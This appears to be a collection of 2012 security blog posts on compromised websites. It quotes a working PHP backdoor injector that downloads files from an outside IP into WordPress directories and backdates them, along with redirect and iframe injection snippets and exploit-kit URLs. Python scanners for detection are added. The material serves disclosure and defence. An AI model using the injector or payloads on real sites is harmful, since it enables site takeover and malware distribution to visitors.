Backdoor Injector code

A backdoor injector code we found on a compromised site:

// For each candidate directory: if it is writable, fetch the backdoor from the remote host,
// write it, set its modification time to $time rather than now, and report the path via die().
if(is__writable($dir."/wp-includes/")):
        file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-includes/page.php', $time);
        die(";;/wp-includes/page.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){
        file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);
        die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload");
}

if(is__writable($dir."/wp-admin/")):
        file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-admin/options-plugin.php', $time);
        die(";;/wp-admin/options-plugin.php;;true_upload");
endif;

if(is__writable($dir."/")):
        file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
        touch($dir.'/wp-plugin.php', $time);
        die(";;/wp-plugin.php;;true_upload");
endif;

if(is__writable($dir."/wp-content/themes/")){
        file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
        touch($dir.'/wp-content/themes/theme.php', $time);
        die(";;/wp-content/themes/theme.php;;true_upload");
}

if(is__writable($dir."/wp-content/uploads/")){
        file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
        touch($dir.'/wp-content/uploads/timthumb.php', $time);
        die(";;/wp-content/uploads/timthumb.php;;true_upload");
}else{
        die(";;0;;false_upload");
}

It checks, in turn, whether wp-includes, the active theme directory, wp-admin, the site root, wp-content/themes or wp-content/uploads is writable, and drops a backdoor (page.php, timthumb.php, options-plugin.php, wp-plugin.php or theme.php, fetched from 67.211.195.81) into the first one that is; the ";;path;;true_upload" string reports the location back to whatever invoked the injector.
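To hunt for this dropper on a WordPress install, here is an added scanner (not code from the original post) that checks for the six paths the injector writes and greps every .php file for the wrapper names and host used in the code above. The theme name, the constructed test tree built by make_sample_install and the uploads/cache.php file name are assumptions.

```python
import os
import tempfile

# Paths the injector above drops, relative to the WordPress root;
# "{theme}" is the active theme directory (get_settings('template')).
DROPPED_PATHS = [
    "wp-includes/page.php",
    "wp-content/themes/{theme}/timthumb.php",
    "wp-admin/options-plugin.php",
    "wp-plugin.php",
    "wp-content/themes/theme.php",
    "wp-content/uploads/timthumb.php",
]
# Strings taken from the injector code itself, to find the dropper wherever it was placed.
INJECTOR_MARKERS = ("file_put_contentz(", "get_contentz(", "is__writable(", "67.211.195.81")

def scan_wordpress(wp_root, theme):
    """Return (dropped files present, .php files containing injector markers).

    A theme may ship its own timthumb.php, so a hit on that path is a lead for
    review rather than proof; the other dropped names are not part of WordPress."""
    dropped = [p.format(theme=theme) for p in DROPPED_PATHS
               if os.path.isfile(os.path.join(wp_root, p.format(theme=theme)))]
    injectors = []
    for dirpath, _, files in os.walk(wp_root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                data = f.read()
            if any(m.encode() in data for m in INJECTOR_MARKERS):
                injectors.append(os.path.relpath(full, wp_root))
    return dropped, sorted(injectors)

def make_sample_install(theme="classic"):
    """Constructed sample tree: two dropped files plus the dropper hidden as uploads/cache.php."""
    root = tempfile.mkdtemp()
    for d in ("wp-includes", "wp-admin", "wp-content/uploads", "wp-content/themes/" + theme):
        os.makedirs(os.path.join(root, d))
    for rel in ("wp-includes/page.php", "wp-content/themes/%s/timthumb.php" % theme):
        with open(os.path.join(root, rel), "w") as f:
            f.write("<?php /* constructed placeholder */\n")
    with open(os.path.join(root, "wp-content/uploads/cache.php"), "w") as f:
        f.write("<?php file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/x'));\n")
    return root

if __name__ == "__main__":
    dropped, injectors = scan_wordpress(make_sample_install(), "classic")
    print("dropped:", dropped, "injector:", injectors)
```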

Large scale TDS redirections

Lots of compromised sites are redirecting to a TDS, always through an injected page with a random four-letter name ending in .html or .htm and an h= parameter.

And that’s just a small sample. We have detected just in February over 500 sites compromised exactly like that.

More Fake jQuery sites – jqueryc.com

We keep seeing fake jQuery sites popping up and being used to distribute malware. One was jquerys.org, another was jquery-framework.com and the new one is jqueryc.com (199.59.241.179).

This new one seems to be affecting many web sites in the last few days. All of them have the following in their header or index.php files:

window.top.location.href = "httx://www.jqueryc.com"

This redirects any visitor to the site to jqueryc.com, which then sends them on to other random spammy domains (a TDS seems to be in place).

Update: We are also seeing some sites with this JavaScript file included: http://www.jqueryc.com/jquery-1.6.3.min.js, which just redirects back to jqueryc.com via the same window.top.location.href assignment.

Note that the domain was just registered (20-Nov-2012), so it is not being flagged anywhere.

The official jQuery sites are jquery.org and jquery.com. Other variations are likely fake.

Iframes generator: http://wordpresstest2.info/1.txt

If your site is loading hidden iframes from *.ftp1.biz/pony, look for a curl or file_get_contents call to http://wordpresstest2.info/1.txt. When you visit that URL, it generates random iframes such as:

http://lsghmr.ftp1.biz/pony ( 206.212.240.20)
http://rchscbul.ftp1.biz/pony ( 206.212.240.20)
http://idzui.ftp1.biz/pony
http://vtfptnmxk.ftp1.biz/pony

These are the iframes that end up displayed on the compromised sites.

badgeplz.com Compromised

Update 2012/Oct/12: Their site was fixed and is not loading malware anymore.

If you are using any widget/code from http://badgeplz.com/, remove it ASAP from your site. It has been compromised and is serving malicious code, so if you have any widget from there, it will be loaded from your site as well (Blackhole exploit kit).

Example:

$ curl -D - http://badgeplz.com/instagram/?u=user
<script>v="va"+"l";try{ebgserb++;}catc h(snregrx){try{(Math+"")()}catch(ztbet) {m= ..

Not only that, but their main site is compromised as well.

Iframes to redkit exploit kit

A new batch of compromised sites is being infected with hidden iframes leading to the Redkit exploit kit. A site gets hacked and an iframe similar to this one is added:

<iframe src="http://ad-d-to.com.br.ms:81/rem2.html..

Once that is loaded into the browser, it redirects anyone visiting the site to:

http://orcasp.com.br/43745180.html

There it tries to make the browser load malicious PDF or JAR files:

<applet archive="http://orcasp.com.br/33256.jar"..

<iframe src="http://orcasp.com.br/98765.pdf"..

And if you are running an outdated version of Java or of Adobe's PDF reader, your personal computer would get compromised as well.

Fake jquery site

We are seeing many sites with fake jQuery links on them from jquery-framework.com (just registered on 2012/08/05):

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

If you use jQuery, make sure to link to reliable sources (either jquery.org or googleapis). This one is redirecting users to http://browser-31.com/s/3013.
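As an added example (not part of the original posts), the following check flags the two injections described in this post and in the jqueryc.com post above: a script src whose host looks like jQuery but is not one of the trusted hosts, and a window.top.location.href redirect. The trusted host list and the sample page are my assumptions, built from the domains named in the posts.

```python
import re
from urllib.parse import urlparse

# Hosts a jQuery include may legitimately come from (per the advice above); an assumption.
TRUSTED_JQUERY_HOSTS = ("jquery.org", "jquery.com", "googleapis.com")

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
TOP_REDIRECT = re.compile(r'window\.top\.location\.href\s*=\s*["\']([^"\']+)["\']', re.I)

def _host(url):
    # Accept the defanged "httx://" spelling used in the posts so quoted samples still parse.
    return (urlparse(url.replace("httx://", "http://")).hostname or "").lower()

def _trusted(host):
    return any(host == t or host.endswith("." + t) for t in TRUSTED_JQUERY_HOSTS)

def find_fake_jquery(html):
    """Return (kind, host) findings: lookalike jQuery script sources and top-level redirects."""
    findings = []
    for src in SCRIPT_SRC.findall(html):
        host = _host(src)
        if "jquery" in host and not _trusted(host):
            findings.append(("lookalike-jquery-src", host))
    for target in TOP_REDIRECT.findall(html):
        findings.append(("top-redirect", _host(target)))
    return findings

# Constructed sample page: one legitimate include plus the injections named in the posts.
SAMPLE_HTML = """<html><head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script src="httx://jquery-framework.com/jquery-1.7.1.js"></script>
<script src="http://www.jqueryc.com/jquery-1.6.3.min.js"></script>
<script>window.top.location.href = "httx://www.jqueryc.com"</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for kind, host in find_fake_jquery(SAMPLE_HTML):
        print(kind, host)
```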

Rebots.php on WordPress

We are seeing a new batch of the rebots.php infections on WordPress and one thing is intriguing us. On many sites we are analysing, WordPress is up to date and no suspicious backdoors or plugins were found. All in order, except for the JavaScript injected inside the theme.

The only thing they have in common is a single login to wp-admin, followed by a visit to wp-admin/theme-editor.php to modify the theme:

184.22.164.xx - - [29/Aug/2012:21:03:02 -0300] "POST ///wp-login.php HTTP/1.1" 302 - "-" ""

184.22.164.xx - - [29/Aug/2012:21:03:13 -0300] "POST //wp-admin/theme-editor.php HTTP/1.1" 302 - "-" ""

184.22.164.xx - - [22/Aug/2012:21:03:16 -0300] "GET //wp-admin//theme-editor.php?file=index.php&theme=classic&scrollto=0&updated=true HTTP/1.1" 200 58188 "-" ""

So it seems someone was able to steal the wp-admin password and edit the theme. It was done automatically (by a script rather than a browser), since no CSS or .js files were loaded.

Another interesting issue is that on some of these sites we didn't identify any brute force attack trying to guess the passwords. Just this single login.

Since we don't know how these passwords were stolen, we recommend changing your wp-admin passwords ASAP until we have more info (especially if you have been compromised with the rebots.php injection).
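One way to spot this sequence in an access log, as an added example rather than anything from the original post: the check below flags an IP that POSTs to wp-login.php and then to theme-editor.php within a short window without fetching any CSS or JS in between. The sample log is constructed from the lines quoted above with the masked octet filled in, plus a made-up normal editing session from a documentation-range address.

```python
import re
from datetime import datetime

# Fields we need from a combined-format access log: client IP, timestamp, method, path.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path = m.groups()
    # Collapse the doubled slashes seen in the injected requests (///wp-login.php).
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, re.sub(r"/+", "/", path)

def is_asset(path):
    return re.search(r"\.(css|js)(\?|$)", path) is not None

def find_theme_editor_abuse(lines, window_seconds=60):
    """IPs that POST to wp-login.php and then POST to theme-editor.php within the
    window while loading no .css/.js in between, i.e. a script rather than a browser."""
    by_ip = {}
    for rec in filter(None, map(parse_line, lines)):
        by_ip.setdefault(rec[0], []).append(rec)
    flagged = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r[1])
        for i, (_, t_login, method, path) in enumerate(recs):
            if method != "POST" or not path.endswith("/wp-login.php"):
                continue
            for _, t, m2, p2 in recs[i + 1:]:
                if (t - t_login).total_seconds() > window_seconds or is_asset(p2):
                    break  # window passed, or a real browser fetched CSS/JS
                if m2 == "POST" and p2.endswith("/wp-admin/theme-editor.php"):
                    flagged.append(ip)
                    break
            if ip in flagged:
                break
    return flagged

# Constructed sample: the sequence quoted above with the masked octet filled in,
# plus a normal editing session from a made-up address that loaded CSS first.
SAMPLE_LOG = [
    '184.22.164.10 - - [29/Aug/2012:21:03:02 -0300] "POST ///wp-login.php HTTP/1.1" 302 - "-" ""',
    '184.22.164.10 - - [29/Aug/2012:21:03:13 -0300] "POST //wp-admin/theme-editor.php HTTP/1.1" 302 - "-" ""',
    '198.51.100.7 - - [29/Aug/2012:22:10:00 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Aug/2012:22:10:01 -0300] "GET /wp-admin/css/wp-admin.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Aug/2012:22:10:40 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]
```

Running find_theme_editor_abuse(SAMPLE_LOG) returns only the scripted address; the browser session is skipped because it fetched a stylesheet between login and edit.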

Server-wide iframe injections

Dennis (from unmask) posted about some iframe injections that he has been seeing lately: RFI: Server-wide iframe injections.

The post is interesting, so read that first. We are also seeing many variations of this attack, always with the iframes being injected as domain.com/[random numbers].html and redirecting the user to Fake AV, on a long list of sites.

Note that all (or most) of these sites are compromised and are being used by the attackers to spread malware, botnet style. Dennis also asked how these sites are being hacked.

Initially, all of them were running Plesk (at least I could access it at site.com:8443). However, as the infection grows, I am seeing many sites with this type of malware that are not using Plesk, so we can't know for sure. We assume it is a mix of attacks (brute force FTP + outdated Plesk + anything they can find).